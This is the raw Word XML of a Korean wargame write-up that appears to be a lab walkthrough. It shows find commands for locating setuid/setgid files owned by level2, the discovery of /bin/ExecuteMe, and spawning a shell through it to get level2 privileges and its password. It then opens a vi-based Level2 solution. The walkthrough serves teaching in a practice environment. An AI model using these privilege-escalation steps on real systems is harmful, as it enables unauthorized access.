      <w:r w:rsidRPr="00703A66">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>setgid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00703A66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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00703A66">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>둘다</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00703A66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가진 파일을 찾습니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00703A66" w:rsidRPr="00703A66" w:rsidRDefault="00703A66" w:rsidP="00703A66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703A66">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">+6000은 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00703A66">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>setuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00703A66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또는 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00703A66">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>setgid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00703A66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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00703A66">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>를</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00703A66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가진 파일을 찾습니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00703A66" w:rsidRPr="00703A66" w:rsidRDefault="00703A66" w:rsidP="00703A66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703A66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실제로</w:t>
      </w:r>
      <w:r w:rsidRPr="00703A66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아래 명령어로 검색해보면 결과가 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00703A66">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>차이납니다</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00703A66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. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00703A66" w:rsidRPr="00703A66" w:rsidRDefault="00703A66" w:rsidP="00703A66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703A66" w:rsidRPr="00703A66" w:rsidRDefault="00703A66" w:rsidP="00703A66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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00703A66">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>find</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00703A66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/ -user level2 -perm +6000 2&gt; /dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00703A66" w:rsidRPr="00703A66" w:rsidRDefault="00703A66" w:rsidP="00703A66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703A66">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>find / -user level2 -perm -6000 2&gt; /dev/null   (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00703A66">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>setuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00703A66">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>만 가진 파일이 검색 안됨)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00703A66" w:rsidRPr="00703A66" w:rsidRDefault="00703A66" w:rsidP="00703A66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703A66" w:rsidRPr="00703A66" w:rsidRDefault="00703A66" w:rsidP="00703A66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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00703A66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첫번째</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00703A66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+6000 명령어로는 /bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00703A66">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>ExecuteMe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00703A66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파일이 찾아집니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00703A66" w:rsidRPr="00703A66" w:rsidRDefault="00703A66" w:rsidP="00703A66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703A66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하지만</w:t>
      </w:r>
      <w:r w:rsidRPr="00703A66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-6000 명령어로는 아무 결과도 나오지 않습니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00703A66" w:rsidRPr="00703A66" w:rsidRDefault="00703A66" w:rsidP="00703A66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703A66" w:rsidRPr="00703A66" w:rsidRDefault="00703A66" w:rsidP="00703A66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703A66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그</w:t>
      </w:r>
      <w:r w:rsidRPr="00703A66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외에 아래는 +6000과 같은 결과를 보이는 find 명령어 입니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00703A66" w:rsidRPr="00703A66" w:rsidRDefault="00703A66" w:rsidP="00703A66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703A66">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>-o는 or를 의미합니다. 이건 그냥 참고로 알고 계시면 됩니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00703A66" w:rsidRPr="00703A66" w:rsidRDefault="00703A66" w:rsidP="00703A66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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00703A66">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>find</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00703A66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/ -user level2 \( -perm -4000 -o -perm -2000 \) -exec </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00703A66">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>ls</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00703A66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-l {} \; 2&gt; /dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00703A66" w:rsidRPr="00703A66" w:rsidRDefault="00703A66" w:rsidP="00703A66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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00703A66">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>find</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00703A66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/ -user level2 \( -perm -4000 -o -perm -2000 \) 2&gt; /dev/null | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00703A66">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>xargs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00703A66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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00703A66">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>ls</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00703A66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-l</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00703A66" w:rsidRDefault="00703A66" w:rsidP="00703A66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3D1104" w:rsidRPr="00703A66" w:rsidRDefault="003D1104" w:rsidP="00703A66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703A66" w:rsidRPr="003D1104" w:rsidRDefault="00703A66" w:rsidP="00703A66">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D1104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>=최종 풀이=</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00703A66" w:rsidRPr="00703A66" w:rsidRDefault="00703A66" w:rsidP="00703A66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C53907" w:rsidRDefault="00703A66" w:rsidP="00703A66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703A66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우리가</w:t>
      </w:r>
      <w:r w:rsidRPr="00703A66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찾은 /bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00703A66">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>ExecuteMe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00703A66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의 권한은 다음과 같습니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BA2EEE" w:rsidRDefault="00BA2EEE" w:rsidP="00703A66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BA2EEE" w:rsidRDefault="00BA2EEE" w:rsidP="00703A66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>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:noProof/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6282811" cy="342900"/>
            <wp:effectExtent l="19050" t="0" r="3689" b="0"/>
            <wp:docPr id="3" name="그림 2" descr="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2581" cy="34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EEE" w:rsidRDefault="00BA2EEE" w:rsidP="00703A66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BA2EEE" w:rsidRPr="00BA2EEE" w:rsidRDefault="00BA2EEE" w:rsidP="00BA2EEE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BA2EEE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level2 소유주의 실행권한으로 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BA2EEE">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>setuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BA2EEE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가 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BA2EEE">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>걸려있는게</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BA2EEE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보입니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BA2EEE" w:rsidRPr="00BA2EEE" w:rsidRDefault="00BA2EEE" w:rsidP="00BA2EEE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BA2EEE" w:rsidRDefault="00BA2EEE" w:rsidP="00BA2EEE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BA2EEE" w:rsidRDefault="00BA2EEE" w:rsidP="00BA2EEE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BA2EEE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실행해보면</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA2EEE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다음과 같고, </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA2EEE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여기서</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA2EEE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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BA2EEE">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BA2EEE">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>나 /bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BA2EEE">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BA2EEE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, /bin/bash 같은 명령어로 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BA2EEE">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>셸을</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BA2EEE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실행하면 level2 권한의 shell을 얻게 됩니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BA2EEE" w:rsidRDefault="00BA2EEE" w:rsidP="00BA2EEE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BA2EEE" w:rsidRDefault="00C5737D" w:rsidP="00BA2EEE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>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:noProof/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6320204" cy="2714625"/>
            <wp:effectExtent l="19050" t="0" r="4396" b="0"/>
            <wp:docPr id="4" name="그림 3" descr="1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1358" cy="271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37D" w:rsidRDefault="00C5737D" w:rsidP="00BA2EEE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C5737D" w:rsidRPr="00C5737D" w:rsidRDefault="00C5737D" w:rsidP="00C5737D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C5737D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이후</w:t>
      </w:r>
      <w:r w:rsidRPr="00C5737D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my-pass 명령어로 level2의 password를 알 수 있습니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C5737D" w:rsidRPr="00C5737D" w:rsidRDefault="00C5737D" w:rsidP="00C5737D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C5737D" w:rsidRPr="00C5737D" w:rsidRDefault="00C5737D" w:rsidP="00C5737D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C5737D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my-pass명령어는 다른 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C5737D">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>리눅스에는</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C5737D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없고 임의로 만든 프로그램으로 보입니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0218D" w:rsidRDefault="00E0218D" w:rsidP="00C5737D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E0218D" w:rsidRDefault="00E0218D" w:rsidP="00C5737D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B246B3" w:rsidRDefault="00B246B3" w:rsidP="00B246B3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B246B3" w:rsidRDefault="00B246B3" w:rsidP="00B246B3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B246B3" w:rsidRDefault="00B246B3" w:rsidP="00B246B3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B246B3" w:rsidRDefault="00B246B3" w:rsidP="00B246B3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B246B3" w:rsidRDefault="00B246B3" w:rsidP="00B246B3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B246B3" w:rsidRDefault="00B246B3" w:rsidP="00B246B3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B246B3" w:rsidRDefault="00B246B3" w:rsidP="00B246B3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E0218D" w:rsidRPr="009A134E" w:rsidRDefault="002E52F9" w:rsidP="00B246B3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>L</w:t>
      </w:r>
      <w:r w:rsidR="00E0218D" w:rsidRPr="009A134E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>evel2</w:t>
      </w:r>
      <w:r w:rsidR="00E0218D" w:rsidRPr="009A134E">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">  [vi editor 고급기능을 이용한 간단 해킹]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0218D" w:rsidRDefault="00E0218D" w:rsidP="00C5737D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B246B3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>password :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B246B3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 xml:space="preserve"> hacker or cracker</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00010BAD" w:rsidRDefault="00010BAD" w:rsidP="00C5737D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00310EBA" w:rsidRPr="00310EBA" w:rsidRDefault="00310EBA" w:rsidP="00310EBA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310EBA">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>vi editor의 고급기능을 이용한 문제입니다</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00310EBA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풀이는</w:t>
      </w:r>
      <w:r w:rsidRPr="00310EBA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매우 간단하지만 이런 취약점을 처음 발견해 내기란 쉽지 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00310EBA">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>않</w:t>
      </w:r>
      <w:r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았</w:t>
      </w:r>
      <w:r w:rsidRPr="00310EBA">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>을겁니다</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00310EBA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일반</w:t>
      </w:r>
      <w:r w:rsidRPr="00310EBA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사용자들은 미처 생각지도 못한 취약점으로 권한이 탈취되는 예라고 볼 수 있습니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00310EBA" w:rsidRPr="00310EBA" w:rsidRDefault="00310EBA" w:rsidP="00310EBA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B246B3" w:rsidRDefault="00310EBA" w:rsidP="00310EBA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310EBA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문제</w:t>
      </w:r>
      <w:r w:rsidRPr="00310EBA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자체는 간단하므로 풀이과정 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00310EBA">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>캡쳐만</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00310EBA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올리겠습니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE2051" w:rsidRDefault="00EE6280" w:rsidP="00310EBA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>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:noProof/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5731510" cy="1966501"/>
            <wp:effectExtent l="19050" t="0" r="2540" b="0"/>
            <wp:docPr id="9" name="그림 4" descr="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051" w:rsidRDefault="00EE6280" w:rsidP="00310EBA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>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:noProof/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5038725" cy="2717217"/>
            <wp:effectExtent l="19050" t="0" r="9525" b="0"/>
            <wp:docPr id="10" name="그림 6" descr="dsfsdfsd_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fsdfsd_2_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637" cy="272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C8C" w:rsidRDefault="007D7C8C" w:rsidP="00310EBA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082EA2" w:rsidRDefault="00634ED4" w:rsidP="00634ED4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634ED4">
        <w:rPr>
